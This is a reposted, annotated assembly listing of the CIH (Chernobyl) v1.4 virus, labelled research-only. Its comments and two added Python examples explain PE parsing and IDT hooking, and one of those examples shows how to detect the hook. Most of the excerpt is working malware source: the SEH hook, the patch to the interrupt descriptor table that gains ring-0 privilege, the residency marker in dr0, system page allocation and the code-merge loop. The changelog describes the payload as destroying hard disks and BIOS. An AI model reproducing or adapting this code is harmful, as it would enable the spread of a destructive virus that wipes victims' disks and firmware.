CIH annotated source (for research only; do not use illegally)


Added: 2002-8-19   Source:   Read 2882 times
;Chinese annotation of CIH virus version 1.4, written by "邹丹" (Zou Dan), completed 1999-4-09
;The English comments of the original source are unchanged and preserved in full
;E-mail: zd_dan@263.net
;Home page: zdweb.yeah.net
;These annotations are for research only; the author takes no responsibility for any other use!!!
;!!!!!! An afterword follows at the end; please take note !!!!!!
; ****************************************************************************  
; *           The Virus Program Information            *  
; ****************************************************************************  
; *                                     *  
; *   Designer : CIH         Source : TTIT of TATUNG in Taiwan  *  
; *   Create Date : 04/26/1998    Now Version : 1.4          *  
; *   Modification Time : 05/31/1998                    *  
; *                                     *  
; *   Turbo Assembler Version 4.0   : tasm /m cih            *  
; *   Turbo Link Version 3.01     : tlink /3 /t cih, cih.exe      * ;build: assembled and linked with
; *                                     * ;Turbo Assembler, which ships
; *==========================================================================* ;with Borland C++ 3.1
; *           Modification History                 *  
; *==========================================================================*  
; *   v1.0  1. Create the Virus Program.                 *  
; *       2. The Virus Modifies IDT to Get Ring0 Privilege.      *  
; * 04/26/1998 3. Virus Code doesn't Reload into System.          *  
; *       4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *  
; *       5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *  
; *       6. When System Opens Existing PE File, the File will be   *  
; *        Infected, and the File doesn't be Reinfected.       *  
; *       7. It is also Infected, even the File is Read-Only.     *  
; *       8. When the File is Infected, the Modification Date and Time *  
; *        of the File also don't be Changed.            *  
; *       9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *  
; *        Previous FileSystemApiHook, it will Call the Function   *  
; *        that the IFS Manager Would Normally Call to Implement   *  
; *        this Particular I/O Request.               *  
; *      10. The Virus Size is only 656 Bytes.             *  
; *==========================================================================*  
; *   v1.1  1. Especially, the File that be Infected will not Increase  *  
; *        it's Size…  ^__^                    *  
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.       *  
; *        When Exception Error Occurs, Our OS System should be in  *  
; *        Windows NT. So My Cute Virus will not Continue to Run,  *  
; *        it will Jmup to Original Application to Run.       *  
; *       3. Use Better Algorithm, Reduce Virus Code Size.       *  
; *       4. The Virus "Basic" Size is only 796 Bytes.         *  
; *==========================================================================*  
; *   v1.2  1. Kill All HardDisk, and BIOS… Super… Killer…     *  
; *       2. Modify the Bug of v1.1                  *  
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.           *  
; *==========================================================================*  
; *   v1.3  1. Modify the Bug that WinZip Self-Extractor Occurs Error.  *  
; *        So When Open WinZip Self-Extractor ==> Don't Infect it.  *  
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes.           *  
; *==========================================================================*  
; *   v1.4  1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *  
; *       2. Change the Date of Killing Computers.           *  
; * 05/31/1998 3. Modify Virus Version Copyright.              *  
; *       4. The Virus "Basic" Size is 1019 Bytes.           *  
; ****************************************************************************  
                                         
        .586P                       ; Pentium protected-mode instruction set (needed for sidt, dr0, iretd)
                                         
; ****************************************************************************  
; *       Original PE Executable File(Don't Modify this Section)    *  
; ****************************************************************************  
                                         
OriginalAppEXE SEGMENT                             
                                         
FileHeader:                           ; complete header of the host PE file: DOS header and stub, PE/COFF header, one
                                      ; .text section. AddressOfEntryPoint is 1010h, i.e. file offset 210h, which is
                                      ; 16 bytes past the host's only instruction (the ret at file offset 200h) and the
                                      ; first byte after this segment: the loader starts the virus, not the host
        db   04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h      
        db   004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h      
        db   0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h      
        db   00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh      
        db   021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h      
        db   069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h      
        db   061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh      
        db   074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh      
        db   020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h      
        db   06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah      
        db   024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h      
        db   0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h      
        db   00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h      
        db   000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h      
        db   000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h      
        db   004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h      
        db   000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h      
        db   000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h      
        db   000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h      
        db   000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        db   0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h      
        dd   00000000h, VirusSize                   
                                         
OriginalAppEXE ENDS                               
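The 520 bytes of FileHeader above are a complete PE image. The following Python parser is an added example and not part of the annotated listing: HOST_STUB transcribes those db lines (only VIRUS_SIZE is an assumption, because this excerpt ends before the VirusSize symbol is defined), the parser walks DOS header, COFF header, optional header and section table, and maps the entry-point RVA to a file offset, which shows why execution starts at MyVirusStart rather than at the host's own ret.

```python
"""Parse the host-stub PE image that the listing embeds as raw db bytes.

Added example, not part of the original listing. HOST_STUB is transcribed from
the db lines of the FileHeader segment; VIRUS_SIZE is an assumption (the page
ends before the VirusSize symbol is defined) used only to fill the final dd.
"""
import struct

VIRUS_SIZE = 1019  # assumption: the v1.4 "basic" size quoted in the header banner

HOST_STUB = (
    bytes.fromhex("4d5a90000300000004000000ffff0000")     # 0x00 IMAGE_DOS_HEADER
    + bytes.fromhex("b8000000000000004000000000000000")   # 0x10
    + bytes(28)                                          # 0x20 reserved fields
    + struct.pack("<I", 0x80)                            # 0x3c e_lfanew
    + bytes.fromhex("0e1fba0e00b409cd21b8014ccd21")      # 0x40 16-bit DOS stub
    + b"This program cannot be run in DOS mode.\r\r\n$"
    + bytes(7)                                           # pad to 0x80
    + b"PE\0\0"                                          # 0x80 PE signature
    + struct.pack("<HHIIIHH", 0x14C, 1, 0x352068F1, 0, 0, 0xE0, 0x10F)   # COFF header
    + struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,  # 0x98 optional header
                  0x10B, 5, 0, 0x1000, 0, 0, 0x1010, 0x1000, 0x2000, 0x400000,
                  0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x2000, 0x200, 0, 2, 0,
                  0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    + bytes(128)                                         # 16 empty data directories
    + b".text\0\0\0"                                     # 0x178 section table (one entry)
    + struct.pack("<IIIIIIHHI", 0x1000, 0x1000, 0x1000, 0x200, 0, 0, 0, 0, 0x60000020)
    + bytes(0x60)                                        # pad to FileAlignment
    + b"\xc3" + bytes(7)                                 # 0x200 host code: a single ret
    + struct.pack("<II", 0, VIRUS_SIZE)                  # 0x208 dd 0, VirusSize (merge table)
)


def parse_pe32(buf):
    """Return the header fields needed to follow the entry point (PE32 only)."""
    if buf[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew, = struct.unpack_from("<I", buf, 0x3C)
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", buf, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry_rva, _, _, image_base = struct.unpack_from("<IIII", buf, opt + 16)
    sections = []
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", buf, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw": rawptr, "rawsize": rawsize, "flags": flags})
    return {"machine": machine, "timestamp": stamp, "characteristics": chars,
            "image_base": image_base, "entry_rva": entry_rva, "sections": sections}


def rva_to_file_offset(hdr, rva):
    """Map an RVA through the section table; raises if no section covers it."""
    for s in hdr["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["raw"]
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def entry_point_report(buf):
    """Where does execution start, and what sits just before it?"""
    hdr = parse_pe32(buf)
    entry_off = rva_to_file_offset(hdr, hdr["entry_rva"])
    code_off = rva_to_file_offset(hdr, hdr["sections"][0]["va"])
    next_chunk, chunk_size = struct.unpack_from("<II", buf, entry_off - 8)  # the dd pair
    return {
        "entry_va": hdr["image_base"] + hdr["entry_rva"],
        "entry_file_offset": entry_off,
        "entry_is_past_stub": entry_off >= len(buf),   # True: entry = first byte of VirusGame
        "host_code_first_byte": buf[code_off],         # 0xC3: the host's only instruction
        "merge_next": next_chunk,
        "merge_size": chunk_size,
    }


if __name__ == "__main__":
    for k, v in entry_point_report(HOST_STUB).items():
        print(f"{k:>22}: {v}")
```

The same parse_pe32 / rva_to_file_offset pair works on any PE32 file read from disk; on an infected binary the interesting check is whether the entry-point file offset falls inside a section's raw data or, as here, in bytes appended past the last section.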
                                         
; ****************************************************************************  
; *           My Virus Game                    *  
; ****************************************************************************  
                                         
; *********************************************************           
; *          Constant Define          *           
; *********************************************************           
                                         
TRUE          =    1                        
FALSE          =    0                        
                                         
DEBUG          =    TRUE                       
                                         
MajorVirusVersion    =    1              ; major version
MinorVirusVersion    =    4              ; minor version

VirusVersion      =    MajorVirusVersion*10h+MinorVirusVersion ; packed version byte (14h for v1.4)
                                         
                                         
IF   DEBUG                              ; debug build?

    FirstKillHardDiskNumber =    81h    ; debug: start wiping at BIOS drive 81h, the second physical hard disk
    HookExceptionNumber   =    05h      ; debug: hook interrupt 5 (BOUND range exceeded)

ELSE

    FirstKillHardDiskNumber =    80h    ; release: start at BIOS drive 80h, the first physical hard disk
    HookExceptionNumber   =    03h      ; release: hook interrupt 3 (breakpoint)
                                         
ENDIF                                      
                                         
                                         
FileNameBufferSize   =    7fh                       
                                         
; *********************************************************           
; *********************************************************           
                                         
VirusGame        SEGMENT                         
                                         
            ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame     
            ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame     
                                         
; *********************************************************           
; *       Ring3 Virus Game Initial Program     *           
; *********************************************************           
                                         
MyVirusStart:                                  
            push  ebp                       
                                         
; *************************************                     
; * Let's Modify Structured Exception *                     
; * Handing, Prevent Exception Error *                     
; * Occurrence, Especially in NT.   *                     
; *************************************                     
                                         
            lea   eax, [esp-04h*2]          ; address of the 8-byte EXCEPTION_REGISTRATION that the two pushes below build

            xor   ebx, ebx
            xchg  eax, fs:[ebx]             ; fs:[0] = that record; eax = previous head of the SEH chain

            call  @0
@0:
            pop   ebx                       ; ebx = run-time address of @0 (delta offset): the code runs at whatever
                                            ; address the host is loaded at, so every label is reached as Label-@0[ebx]
            lea   ecx, StopToRunVirusCode-@0[ebx]
            push  ecx                       ; record.handler = StopToRunVirusCode

            push  eax                       ; record.prev    = previous chain head
                                         
; *************************************                     
; * Let's Modify           *                     
; * IDT(Interrupt Descriptor Table)  *                     
; * to Get Ring0 Privilege…     *                     
; *************************************                     
                                         
            push  eax                       ; reserve 4 bytes on the stack
            sidt  [esp-02h]                 ; Get IDT Base Address: the 6-byte IDTR lands at esp-2 (limit at esp-2, 32-bit base at esp)
            pop   ebx                       ; ebx = IDT base

            add   ebx, HookExceptionNumber*08h+04h ; ZF = 0 ; ebx = address of gate n's high dword. MyExceptionHook tells its two
                                            ; callers apart by ZF, which int n does not change: clear on this first entry (the
                                            ; non-zero results of this add and of shr esi,16 below), set on the second

            cli                             ; no interrupts while the gate is being rewritten

            Mov   ebp, [ebx]   ; Get Exception Base  ; high dword of the gate: offset bits 31..16 in its top word
            mov   bp, [ebx-04h]  ; Entry Point       ; low word of the gate = offset bits 15..0; ebp = original handler address

            lea   esi, MyExceptionHook-@1[ecx]      ; esi = run-time address of the ring-0 hook (ecx still holds @1)

            push  esi                       ; the shr below destroys esi, and the hook needs it again (lea at its end)

            mov   [ebx-04h], si             ; offset 15..0
            shr   esi, 16         ; Modify Exception
            mov   [ebx+02h], si   ; Entry Point Address ; offset 31..16; selector and type/DPL byte are left as they were

            pop   esi
                                         
; *************************************                     
; * Generate Exception to Get Ring0  *                     
; *************************************                     
                                         
            int   HookExceptionNumber   ; GenerateException ; software interrupt through the patched gate: MyExceptionHook runs at ring 0
ReturnAddressOfEndException   =    $                    
                                         
; *************************************                     
; * Merge All Virus Code Section   *                     
; *************************************                     
                                         
            push  esi
            mov   esi, eax                  ; set by the hook: eax = address of MyVirusStart, edi = allocated system pages

LoopOfMergeAllVirusCodeSection:

            mov   ecx, [eax-04h]            ; size of this chunk (VirusSize for the base file: see the dd after FileHeader)

            rep   movsb                     ; copy the chunk to the system memory

            sub   eax, 08h                  ; step down the table of (next chunk address, chunk size) pairs below MyVirusStart

            mov   esi, [eax]                ; address of the next chunk; 0 ends the list

            or    esi, esi
            jz    QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ; done; ZF stays set for the int below

            jmp   LoopOfMergeAllVirusCodeSection    ; copy the next chunk
                                         
QuitLoopOfMergeAllVirusCodeSection:                       
                                         
            pop   esi                       
                                         
; *************************************                     
; * Generate Exception Again     *                     
; *************************************                     
                                         
            int   HookExceptionNumber   ; GenerateException Again ; re-enter ring 0 with ZF = 1: MyExceptionHook now takes the
                                        ; jz to InstallMyFileSystemApiHook and continues from the merged copy
                                         
; *************************************                     
; * Let's Restore           *                     
; * Structured Exception Handing   *                     
; *************************************                     
                                         
ReadyRestoreSE:                                 
            sti                             ; interrupts back on (cli above)
                                         
            xor   ebx, ebx                     
                                         
            jmp   RestoreSE                    
                                         
; *************************************                     
; * When Exception Error Occurs,   *                     
; * Our OS System should be in NT.  *                     
; * So My Cute Virus will not     *                     
; * Continue to Run, it Jmups to   *                     
; * Original Application to Run.   *                     
; *************************************                     
                                         
StopToRunVirusCode:
@1           =    StopToRunVirusCode

            xor   ebx, ebx                  ; entered as the SEH handler when the code above faults (e.g. the IDT write on NT)
            mov   eax, fs:[ebx]             ; head of the SEH chain during the callback: the dispatcher's own record,
            mov   esp, [eax]                ; whose prev link is the record built at MyVirusStart; esp is unwound to it

RestoreSE:
            pop   dword ptr fs:[ebx]        ; fs:[0] = previous chain head: the record is unlinked
            pop   eax                       ; discard the handler address
                                         
; *************************************                     
; * Return Original App to Execute  *                     
; *************************************                     
                                         
            pop   ebp

            push  00401000h    ; Push Original            ; the immediate at OriginalAddressOfEntryPoint holds the host's
OriginalAddressOfEntryPoint   =    $-4   ; App Entry Point to Stack ; original entry point (401000h in this base file: the ret)
                                          
            ret   ; Return to Original App Entry Point ; return to the host via ret, so no absolute jmp needs relocating
                                         
; *********************************************************           
; *       Ring0 Virus Game Initial Program     *           
; *********************************************************           
                                         
MyExceptionHook:
@2           =    MyExceptionHook

            jz   InstallMyFileSystemApiHook    ; ZF = 1: second entry, the code has been merged; go install the file-system
                                               ; hook (that routine comes later in the full source and is not in this excerpt)
; *************************************
; * Do My Virus Exist in System !?  *
; *************************************

            mov   ecx, dr0             ; dr0 is the residency marker: non-zero once the virus has been installed
            jecxz  AllocateSystemMemoryPage     ; not resident yet: allocate system memory

            add   dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
                                        ; already resident: advance the ring-3 return address in the iretd frame so that
                                        ; execution resumes at ReadyRestoreSE, skipping the merge loop and the second int
                                         
; *************************************                     
; * Return to Ring3 Initial Program  *                     
; *************************************                     
                                         
ExitRing0Init:
            mov   [ebx-04h], bp  ;                   ; write the saved handler offset (ebp) back into the gate:
            shr   ebp, 16     ; Restore Exception    ; low word to [ebx-4], high word to [ebx+2]
            mov   [ebx+02h], bp  ;

            iretd                  ; back to ring 3, at the instruction after the int
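The gate edit at MyVirusStart and its undo at ExitRing0Init write only the two 16-bit halves of the handler offset. The Python below is an added example, not code from the listing: it models a 32-bit interrupt gate as the CPU lays it out, replays that edit and its restore on a constructed sample IDT (the handler addresses, the selector 28h and the gate types are sample values), and shows the integrity check a defender can run over an IDT snapshot.

```python
"""Model a 32-bit x86 interrupt gate and replay the listing's IDT edit.

Added example, not code from the listing. Gate layout follows the Intel SDM
(offset 15..0, selector, reserved byte, type/DPL/P byte, offset 31..16). The IDT
built by sample_idt() is constructed: handler addresses, the selector 0x28 and
the gate types are sample values, not taken from any real system.
"""
import struct

GATE = "<HHBBH"          # offset_lo, selector, zero, type_attr, offset_hi
GATE_SIZE = 8


def pack_gate(offset, selector=0x28, type_attr=0x8E):
    """0x8E = present, DPL 0, 32-bit interrupt gate; 0xEE is the same with DPL 3."""
    return struct.pack(GATE, offset & 0xFFFF, selector, 0, type_attr, offset >> 16)


def unpack_gate(desc):
    lo, selector, _, type_attr, hi = struct.unpack(GATE, desc)
    return {"offset": (hi << 16) | lo, "selector": selector, "type_attr": type_attr,
            "dpl": (type_attr >> 5) & 3, "present": bool(type_attr & 0x80)}


def sample_idt():
    """Eight gates; vectors 3 and 5 are DPL 3 so that int 3 / int 5 work from ring 3."""
    return b"".join(pack_gate(0xC0001000 + v * 0x40, type_attr=0xEE if v in (3, 5) else 0x8E)
                    for v in range(8))


def hook_gate(idt, vector, new_handler):
    """Replay MyVirusStart: ebx = base + vector*8 + 4, save the old offset, write the new one.

    Returns (patched idt, saved offset); the listing keeps the saved value in ebp.
    """
    idt = bytearray(idt)
    ebx = vector * GATE_SIZE + 4
    ebp, = struct.unpack_from("<I", idt, ebx)                              # mov ebp,[ebx]  : top word = offset 31..16
    ebp = (ebp & 0xFFFF0000) | struct.unpack_from("<H", idt, ebx - 4)[0]   # mov bp,[ebx-4] : offset 15..0
    struct.pack_into("<H", idt, ebx - 4, new_handler & 0xFFFF)             # mov [ebx-4],si
    struct.pack_into("<H", idt, ebx + 2, new_handler >> 16)                # mov [ebx+2],si
    return bytes(idt), ebp


def restore_gate(idt, vector, ebp):
    """Replay ExitRing0Init: put the saved offset halves back; nothing else is touched."""
    idt = bytearray(idt)
    ebx = vector * GATE_SIZE + 4
    struct.pack_into("<H", idt, ebx - 4, ebp & 0xFFFF)      # mov [ebx-4],bp
    struct.pack_into("<H", idt, ebx + 2, ebp >> 16)         # shr ebp,16 ; mov [ebx+2],bp
    return bytes(idt)


def find_hooked_vectors(idt, baseline):
    """Defender side: vectors whose handler or gate attributes differ from a trusted snapshot."""
    diffs = []
    for v in range(len(idt) // GATE_SIZE):
        cur = unpack_gate(idt[v * GATE_SIZE:(v + 1) * GATE_SIZE])
        ref = unpack_gate(baseline[v * GATE_SIZE:(v + 1) * GATE_SIZE])
        if (cur["offset"], cur["selector"], cur["type_attr"]) != (ref["offset"], ref["selector"], ref["type_attr"]):
            diffs.append((v, ref["offset"], cur["offset"]))
    return diffs


def user_reachable(gate):
    """A software int n from ring 3 only enters a present gate whose DPL is 3."""
    return gate["present"] and gate["dpl"] == 3


if __name__ == "__main__":
    base = sample_idt()
    hooked, saved = hook_gate(base, 3, 0x00412345)
    print("hooked:", find_hooked_vectors(hooked, base))
    print("restored clean:", find_hooked_vectors(restore_gate(hooked, 3, saved), base) == [])
```

The check in find_hooked_vectors is deliberately blind to how the offset was written: whether a hook rewrites the whole descriptor or, as here, only its two offset halves, the handler address no longer matches the baseline, while the unchanged selector and DPL 3 type are exactly what let a ring-3 int n reach the new handler in the kernel code segment.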
                                         
; *************************************                     
; * Allocate SystemMemory Page to Use *                     
; *************************************                     
                                         
AllocateSystemMemoryPage:

            mov   dr0, ebx    ; Set the Mark of My Virus Exist in System
                              ; ebx (address of the gate's high dword) is non-zero, which is all the dr0 test above needs
            push  00000000fh   ; flags     = 0Fh: PAGEZEROINIT | PAGEUSEALIGN | PAGECONTIG | PAGEFIXED
            push  ecx          ; PhysAddr  = 0   (ecx is 0 here, jecxz was taken; push ecx is 1 byte shorter than push 0)
            push  0ffffffffh   ; maxPhys   = -1
            push  ecx          ; minPhys   = 0   C argument order, pushed right to left; the prototype is
            push  ecx          ; AlignMask = 0   ULONG _PageAllocate(ULONG nPages, ULONG pType, ULONG VM, ULONG AlignMask,
            push  ecx          ; VM        = 0      ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr, ULONG flags);
            push  000000001h   ; pType     = PG_SYS (1)
            push  000000002h   ; nPages    = 2
            int   20h          ; VMMCALL _PageAllocate ; VxD dynamic-link call: int 20h followed by a dword service id
_PageAllocate      =    $
            dd   00010053h    ; Use EAX, ECX, EDX, and flags ; high word 0001h = VMM, low word 0053h = _PageAllocate
            add   esp, 08h*04h  ; caller pops the 8 dword arguments

            xchg  edi, eax    ; EDI = SystemMemory Start Address (linear address of the pages just allocated)
            lea   eax, MyVirusStart-@2[esi] ; EAX = address of MyVirusStart (esi still holds @2, saved around the shr at ring 3)

            iretd  ; Return to Ring3 Initial Program ; resumes after the first int, at the merge loop, with EAX and EDI set
